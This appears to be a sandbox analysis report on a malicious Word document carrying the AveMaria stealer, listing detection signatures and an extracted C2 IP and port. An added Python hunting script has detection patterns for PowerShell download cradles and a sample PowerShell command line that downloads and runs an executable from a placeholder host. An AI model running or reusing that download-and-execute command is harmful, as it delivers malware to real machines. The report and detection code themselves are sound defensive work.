Windows Analysis Report catalogue_2021_samples_list_revise_ol.doc
Overview
General Information
Detection: AveMaria, UACMe
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and execute file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Increases the number of concurrent connection per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Contains functionality to steal e-mail passwords
Contains functionality to steal Chrome passwords or cookies
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Found suspicious RTF objects
Contains functionality to create new users
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to enumerate running services
Sigma detected: Verclsid.exe Runs COM Object
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Sigma detected: Windows PowerShell Web Request
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Classification
Process Tree

Malware Configuration

Threatname: AveMaria
{"C2 url": "152.67.253.163", "port": 5300}
Yara Overview

Memory Dumps (27 entries; 5 shown)

Rule | Description | Author
---|---|---
PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security

Unpacked PEs (24 entries; 5 shown)

Rule | Description | Author
---|---|---
Codoso_Gh0st_2 | Detects Codoso APT Gh0st Malware | Florian Roth
Codoso_Gh0st_1 | Detects Codoso APT Gh0st Malware | Florian Roth
JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security
MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell (authors: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team)
Sigma detected: PowerShell DownloadFile (author: Florian Roth)
Sigma detected: Verclsid.exe Runs COM Object (authors: Victor Sergeev, oscd.community)
Sigma detected: Windows PowerShell Web Request (author: James Pemberton / @4A616D6573)
Sigma detected: PowerShell Download from URL (authors: Florian Roth, oscd.community, Jonhnathan Ribeiro)
Sigma detected: Non Interactive PowerShell (authors: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements))

Data Obfuscation:

Sigma detected: Powershell download and execute file (author: Joe Security)
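The Sigma hits above describe a chain that recurs in macro droppers: an Office process spawns PowerShell, which pulls a PE over HTTP with the execution policy bypassed, and the payload then calls back to the C2 listed in the Malware Configuration section (152.67.253.163, TCP 5300). The following Python is an added hunting example, not Joe Sandbox or Sigma rule-author code: it implements those behaviours as checks over process-creation and connection records and matches traffic against the extracted C2. The record layouts, the 1000-character "very long command line" cut-off, and every path and IP other than the report's C2 are assumptions and constructed sample data, so map the fields to your own telemetry (for example Sysmon event ID 1 and 3) before use.

```python
"""Hunt for the Office -> PowerShell download cradle and AveMaria C2 traffic this report flags.

Added example, not Joe Sandbox code. Log layouts below are constructed; adapt to real telemetry.
"""
import json
import re
from dataclasses import dataclass
from typing import List, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download cradles commonly seen in macro droppers (WebClient.DownloadFile, IWR, BITS ...).
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\b(?:iwr|wget|curl)\b|"
    r"start-bitstransfer|net\.webclient", re.I)
# "-ep bypass" / "-ExecutionPolicy Unrestricted": the execution-policy bypass the report notes.
EXEC_POLICY_BYPASS = re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+(?:bypass|unrestricted)", re.I)
# "-enc"/"-EncodedCommand" followed by a long base64 blob.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I)
# Assumed threshold for the "very long cmdline" signature; the report does not state its cut-off.
LONG_CMDLINE = 1000


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def proc_findings(ev: ProcEvent) -> List[str]:
    """Return the behaviour tags a process-creation event trips, in a fixed order."""
    findings = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in OFFICE_PARENTS and child in SHELLS:
        findings.append("office_spawns_shell")
    if child in POWERSHELL:
        if DOWNLOAD_CRADLE.search(ev.command_line):
            findings.append("powershell_download_cradle")
        if EXEC_POLICY_BYPASS.search(ev.command_line):
            findings.append("execution_policy_bypass")
        if ENCODED_CMD.search(ev.command_line):
            findings.append("encoded_command")
    if len(ev.command_line) > LONG_CMDLINE:
        findings.append("very_long_cmdline")
    return findings


def c2_from_config(config_json: str) -> Tuple[str, int]:
    """Parse the report's Malware Configuration JSON into (host, port)."""
    cfg = json.loads(config_json)
    return cfg["C2 url"], int(cfg["port"])


def match_c2(conn_lines: List[str], host: str, port: int) -> List[str]:
    """Constructed 'src sport dst dport proto' records; return those hitting host:port."""
    hits = []
    for line in conn_lines:
        _src, _sport, dst, dport, _proto = line.split()
        if dst == host and int(dport) == port:
            hits.append(line)
    return hits


# Copied from the report's Malware Configuration section.
REPORT_CONFIG = '{"C2 url": "152.67.253.163", "port": 5300}'

# Constructed sample telemetry; paths, URL and non-C2 addresses are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -ep bypass -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe');"
              "Start-Process C:\\Users\\Public\\x.exe\""),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Date"),
]
SAMPLE_CONN_LOG = [
    "10.0.0.5 49812 152.67.253.163 5300 tcp",
    "10.0.0.5 49813 203.0.113.10 443 tcp",
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev.image), proc_findings(ev))
    host, port = c2_from_config(REPORT_CONFIG)
    print("C2 hits:", match_c2(SAMPLE_CONN_LOG, host, port))
```

The first sample event trips three of the checks at once (Office parent, download cradle, execution-policy bypass), which is the combination worth alerting on; a lone PowerShell web request from explorer.exe trips none. The C2 match is deliberately exact on host and port because 5300 is not a service port and a hit on it is high confidence; widen it to the IP alone if you expect the port to rotate.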
Jbx Signature Overview
AV Detection:

Antivirus detection for URL or domain
Source: Avira URL Cloud
Found malware configuration
Source: Malware Configuration Extractor
Multi AV Scanner detection for submitted file
Source: Virustotal; ReversingLabs
Yara detected AveMaria stealer
Source: File source (12 matches)
Multi AV Scanner detection for dropped file
Source: ReversingLabs (3 dropped files)
Machine Learning detection for dropped file
Source: Joe Sandbox ML (3 dropped files)
Source: Avira
Source: Code function (6 matches)
Exploits:

Yara detected UACMe UAC Bypass tool
Source: File source (10 matches)
Source: File opened
Source: Directory created
Source: Binary string (14 matches)
Source: Code function
Source: File opened (6 matches)
Source: Code function (2 matches)
Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: File created (dropped file)
Document exploit detected (creates forbidden files)
Source: File created (2 matches)
Document exploit detected (process start blacklist hit)
Source: Process created
Source: TCP traffic (2 matches)
Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Snort IDS (3 alerts)
C2 URLs / IPs found in malware configuration
Source: URLs
Source: HTTP traffic detected (2 matches)